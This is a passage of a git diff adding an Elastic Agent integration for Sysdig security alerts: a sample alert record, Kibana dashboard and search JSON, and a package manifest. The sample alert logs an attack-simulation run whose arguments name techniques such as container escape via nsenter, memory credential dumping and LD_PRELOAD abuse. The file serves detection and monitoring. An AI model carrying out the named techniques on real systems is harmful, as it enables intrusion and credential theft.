(./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)", + "proc.pid": "2140169", + "proc.pname": "pwsh", + "proc.ppid": "2140088", + "user.name": "root", + "user.uid": "0" + }, + "output": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "User Management Event Detected", + "ruleTags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec715376910362c8c3f62a4ceda2e", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720031001639981000, + "timestampRFC3339Nano": "2024-07-03T18:23:21.63998111Z", + "type": "policy" + }, + "tags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "threat.technique.id": [ + "T1136" + ] +} +``` \ No newline at end of file diff --git a/packages/sysdig/img/sysdig-events-screenshot.png b/packages/sysdig/img/sysdig-events-screenshot.png new file mode 100644 index 00000000000..1aece4e7612 Binary files /dev/null and b/packages/sysdig/img/sysdig-events-screenshot.png differ diff --git a/packages/sysdig/img/sysdig-logo-badge.svg b/packages/sysdig/img/sysdig-logo-badge.svg new file mode 100644 index 00000000000..bc13da3c2e8 --- /dev/null +++ b/packages/sysdig/img/sysdig-logo-badge.svg @@ -0,0 +1,27 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/packages/sysdig/kibana/dashboard/sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b.json b/packages/sysdig/kibana/dashboard/sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b.json new file mode 100644 index 00000000000..7dbb0888398 --- /dev/null +++ b/packages/sysdig/kibana/dashboard/sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b.json @@ -0,0 +1,1009 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": { + "ignoreFilters": false, + "ignoreQuery": false, + "ignoreTimerange": false, + "ignoreValidations": false + }, + "panelsJSON": { + "04629dab-a612-46d1-ae42-4387909be583": { + "explicitInput": { + "enhancements": {}, + "fieldName": "rule.name", + "grow": true, + "id": "04629dab-a612-46d1-ae42-4387909be583", + "searchTechnique": "prefix", + "title": "Filter by Rule", + "width": "medium" + }, + "grow": true, + "order": 3, + "type": "optionsListControl", + "width": "medium" + }, + "04e85dec-ba9f-4c82-933f-7b0948c83609": { + "explicitInput": { + "enhancements": {}, + "fieldName": "host.name", + "grow": true, + "id": "04e85dec-ba9f-4c82-933f-7b0948c83609", + "searchTechnique": "prefix", + "title": "Filter by Host", + "width": "medium" + }, + "grow": true, + "order": 1, + "type": "optionsListControl", + "width": "medium" + }, + "5145797a-1b1a-4af7-a727-e78bc8f820f5": { + "explicitInput": { + "enhancements": {}, + "fieldName": "log.syslog.severity.name", + "grow": true, + "id": "5145797a-1b1a-4af7-a727-e78bc8f820f5", + "searchTechnique": "prefix", + "title": "Filter by Severity", + "width": "medium" + }, + "grow": true, + "order": 2, + "type": "optionsListControl", + "width": "medium" + }, + "5638457b-3f24-4bf0-9ef7-c80b2c10436d": { + "explicitInput": { + "enhancements": {}, + "fieldName": "orchestrator.resource.name", + "grow": true, + "id": "5638457b-3f24-4bf0-9ef7-c80b2c10436d", + "searchTechnique": "prefix", + "title": "Filter by Pod", + "width": "medium" + }, + "grow": true, + "order": 0, + "type": "optionsListControl", + "width": "small" + } + }, + "showApplySelections": false + }, + "description": "Managed dashboard for reviewing Alerts gathered via the Sysdig Integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "sysdig.alerts" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "sysdig.alerts" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "description": "", + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Overview\n\nThis dashboard provides information about the Security Alerts collected by the Sysdig integration.\n\nAlerts are broken down by category, source, and type of event. Further investigation into the details of the individual Alerts can be done via Alert Stream display.\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 14, + "i": "c82c4928-79d6-48a2-89b0-ded609749392", + "w": 14, + "x": 0, + "y": 0 + }, + "panelIndex": "c82c4928-79d6-48a2-89b0-ded609749392", + "title": "", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9352d482-2466-4287-8f85-cc92b8467ed3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "9352d482-2466-4287-8f85-cc92b8467ed3": { + "columnOrder": [ + "be385bde-3dff-42d4-83ee-dc3f18a0aefe", + "370196fa-9403-4c03-b65a-264f76c9fe14" + ], + "columns": { + "370196fa-9403-4c03-b65a-264f76c9fe14": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be385bde-3dff-42d4-83ee-dc3f18a0aefe": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "370196fa-9403-4c03-b65a-264f76c9fe14" + ], + "colorMapping": { + "assignments": [], + "colorMode": { + "type": "categorical" + }, + "paletteId": "eui_amsterdam_color_blind", + "specialAssignments": [ + { + "color": { + "type": "loop" + }, + "rule": { + "type": "other" + }, + "touched": false + } + ] + }, + "layerId": "9352d482-2466-4287-8f85-cc92b8467ed3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "be385bde-3dff-42d4-83ee-dc3f18a0aefe" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {} + }, + "gridData": { + "h": 14, + "i": "7f8a3857-9646-4e87-a909-7836592adc1c", + "w": 17, + "x": 14, + "y": 0 + }, + "panelIndex": "7f8a3857-9646-4e87-a909-7836592adc1c", + "title": "Alerts Over Time [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e7feffed-f114-424a-9408-e0a423fae0ae", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "e7feffed-f114-424a-9408-e0a423fae0ae": { + "columnOrder": [ + "4dab2b7e-7121-4dce-a3f7-3c759b293f09", + "99f06fa2-3eeb-40f3-a072-92903b5653df", + "efded5ec-7c5e-4b12-bced-1ab15ae142e4" + ], + "columns": { + "4dab2b7e-7121-4dce-a3f7-3c759b293f09": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "99f06fa2-3eeb-40f3-a072-92903b5653df", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "99f06fa2-3eeb-40f3-a072-92903b5653df": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "efded5ec-7c5e-4b12-bced-1ab15ae142e4": { + "customLabel": true, + "dataType": "date", + "filter": { + "language": "kuery", + "query": "\"@timestamp\": * AND data_stream.dataset: \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Most Recent Alert", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "@timestamp" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "4dab2b7e-7121-4dce-a3f7-3c759b293f09", + "isMetric": false, + "isTransposed": false, + "width": 198.33333333333334 + }, + { + "alignment": "center", + "columnId": "99f06fa2-3eeb-40f3-a072-92903b5653df", + "isMetric": true, + "isTransposed": false + }, + { + "columnId": "efded5ec-7c5e-4b12-bced-1ab15ae142e4", + "isMetric": true, + "isTransposed": false + } + ], + "layerId": "e7feffed-f114-424a-9408-e0a423fae0ae", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 14, + "i": "c68eebc4-4682-49a0-88f7-22668fb883ad", + "w": 17, + "x": 31, + "y": 0 + }, + "panelIndex": "c68eebc4-4682-49a0-88f7-22668fb883ad", + "title": "Alerts by Host - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b633214f-c828-455e-96c6-1ac90976ee31", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b633214f-c828-455e-96c6-1ac90976ee31": { + "columnOrder": [ + "215e124b-982d-4057-9524-48517973596b", + "65cd62cf-dd7d-4c83-8718-d4418550e824", + "4e7188de-2148-4e71-bb2e-6678e1ee4e1d" + ], + "columns": { + "215e124b-982d-4057-9524-48517973596b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Pod Name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "orchestrator.resource.name" + }, + "4e7188de-2148-4e71-bb2e-6678e1ee4e1d": { + "customLabel": true, + "dataType": "date", + "filter": { + "language": "kuery", + "query": "\"@timestamp\": * AND data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Most Recent Alert", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "@timestamp" + }, + "65cd62cf-dd7d-4c83-8718-d4418550e824": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "215e124b-982d-4057-9524-48517973596b", + "isMetric": false, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "65cd62cf-dd7d-4c83-8718-d4418550e824", + "isMetric": true, + "isTransposed": false + }, + { + "columnId": "4e7188de-2148-4e71-bb2e-6678e1ee4e1d", + "isMetric": true, + "isTransposed": false + } + ], + "layerId": "b633214f-c828-455e-96c6-1ac90976ee31", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "05632923-d5d0-4fb4-8e30-c4c91d625814", + "w": 24, + "x": 0, + "y": 14 + }, + "panelIndex": "05632923-d5d0-4fb4-8e30-c4c91d625814", + "title": "Alerts by Pod - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fceae10d-23d2-4b72-85ea-8f92cf73a437", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fceae10d-23d2-4b72-85ea-8f92cf73a437": { + "columnOrder": [ + "597358bc-1934-42cb-b930-573f9f976ea7", + "77240ba1-7fd1-445e-9cfb-09e55cf0e788" + ], + "columns": { + "597358bc-1934-42cb-b930-573f9f976ea7": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Alert Severity Codes - Top 10", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "77240ba1-7fd1-445e-9cfb-09e55cf0e788", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "log.syslog.severity.name" + }, + "77240ba1-7fd1-445e-9cfb-09e55cf0e788": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "colorMapping": { + "assignments": [ + { + "color": { + "colorIndex": 0, + "paletteId": "eui_amsterdam_color_blind", + "type": "categorical" + }, + "rule": { + "type": "matchExactly", + "values": [] + }, + "touched": false + } + ], + "colorMode": { + "type": "categorical" + }, + "paletteId": "eui_amsterdam_color_blind", + "specialAssignments": [ + { + "color": { + "type": "loop" + }, + "rule": { + "type": "other" + }, + "touched": false + } + ] + }, + "layerId": "fceae10d-23d2-4b72-85ea-8f92cf73a437", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "77240ba1-7fd1-445e-9cfb-09e55cf0e788" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "597358bc-1934-42cb-b930-573f9f976ea7" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "9cce2923-fcb6-4669-a18b-a6ce56bd7c6f", + "w": 24, + "x": 24, + "y": 14 + }, + "panelIndex": "9cce2923-fcb6-4669-a18b-a6ce56bd7c6f", + "title": "Alerts by Priority - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-82eea8c4-375f-40ef-8a3f-a993d383826d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "82eea8c4-375f-40ef-8a3f-a993d383826d": { + "columnOrder": [ + "046f84d4-e094-48f7-86bd-9cd22a76b380", + "1cfbc396-e6f5-47be-b610-0d2f3bd36b39" + ], + "columns": { + "046f84d4-e094-48f7-86bd-9cd22a76b380": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Rule Name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1cfbc396-e6f5-47be-b610-0d2f3bd36b39", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "rule.name" + }, + "1cfbc396-e6f5-47be-b610-0d2f3bd36b39": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset : \"sysdig.alerts\"" + }, + "isBucketed": false, + "label": "Alert Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "046f84d4-e094-48f7-86bd-9cd22a76b380", + "isMetric": false, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "1cfbc396-e6f5-47be-b610-0d2f3bd36b39", + "isMetric": true, + "isTransposed": false + } + ], + "layerId": "82eea8c4-375f-40ef-8a3f-a993d383826d", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "f039303b-80d7-41d9-9a63-40767cb7a2b4", + "w": 24, + "x": 0, + "y": 29 + }, + "panelIndex": "f039303b-80d7-41d9-9a63-40767cb7a2b4", + "title": "Rules Triggered - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "columns": [ + "@timestamp", + "event.original", + "host.name", + "log.syslog.severity.name" + ], + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "sysdig.alerts" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "sysdig.alerts" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "timeRestore": false + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b", + "type": "search" + } + ], + "timeRestore": false, + "title": "[Logs Sysdig] Alerts Overview", + "version": 2 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-09-03T17:27:13.645Z", + "created_by": "u_mGBROF_q5bmFCATbLXAcCwKa0k8JvONAwSruelyKA5E_0", + "id": "sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f8a3857-9646-4e87-a909-7836592adc1c:indexpattern-datasource-layer-9352d482-2466-4287-8f85-cc92b8467ed3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c68eebc4-4682-49a0-88f7-22668fb883ad:indexpattern-datasource-layer-e7feffed-f114-424a-9408-e0a423fae0ae", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "05632923-d5d0-4fb4-8e30-c4c91d625814:indexpattern-datasource-layer-b633214f-c828-455e-96c6-1ac90976ee31", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9cce2923-fcb6-4669-a18b-a6ce56bd7c6f:indexpattern-datasource-layer-fceae10d-23d2-4b72-85ea-8f92cf73a437", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f039303b-80d7-41d9-9a63-40767cb7a2b4:indexpattern-datasource-layer-82eea8c4-375f-40ef-8a3f-a993d383826d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b:kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5638457b-3f24-4bf0-9ef7-c80b2c10436d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_04e85dec-ba9f-4c82-933f-7b0948c83609:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5145797a-1b1a-4af7-a727-e78bc8f820f5:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_04629dab-a612-46d1-ae42-4387909be583:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "10.2.0" +} \ No newline at end of file diff --git a/packages/sysdig/kibana/search/sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b.json b/packages/sysdig/kibana/search/sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b.json new file mode 100644 index 00000000000..b063d90e32d --- /dev/null +++ b/packages/sysdig/kibana/search/sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b.json @@ -0,0 +1,73 @@ +{ + "attributes": { + "columns": [ + "@timestamp", + "event.original", + "host.name", + "log.syslog.severity.name" + ], + "description": "", + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "sysdig.alerts" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "sysdig.alerts" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "timeRestore": false, + "title": "Alert Stream [Logs Sysdig]" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-08-22T15:56:04.848Z", + "created_by": "u_mGBROF_q5bmFCATbLXAcCwKa0k8JvONAwSruelyKA5E_0", + "id": "sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "type": "search", + "typeMigrationVersion": "10.3.0" +} \ No newline at end of file diff --git a/packages/sysdig/manifest.yml b/packages/sysdig/manifest.yml new file mode 100644 index 00000000000..7406c41ee00 --- /dev/null +++ b/packages/sysdig/manifest.yml @@ -0,0 +1,37 @@ +format_version: 3.2.1 +name: sysdig +title: "Sysdig" +version: 0.1.0 +description: "Collect alerts from Sysdig using Elastic Agent." +type: integration +categories: + - containers + - kubernetes + - monitoring + - security +conditions: + kibana: + version: "^8.14.1" + elastic: + subscription: "basic" +screenshots: + - src: /img/sysdig-events-screenshot.png + title: Sysdig Events dashboard screenshot + size: 600x600 + type: image/png +icons: + - src: /img/sysdig-logo-badge.svg + title: Sysdig logo + size: 88x32 + type: image/svg+xml +policy_templates: + - name: sysdig + title: Sysdig Alerts + description: Collect Alerts from Sysdig using Elastic Agent + inputs: + - type: http_endpoint + title: Collect Sysdig Alerts via HTTP + description: Collect Sysdig Alerts via HTTP input +owner: + github: elastic/security-service-integrations + type: elastic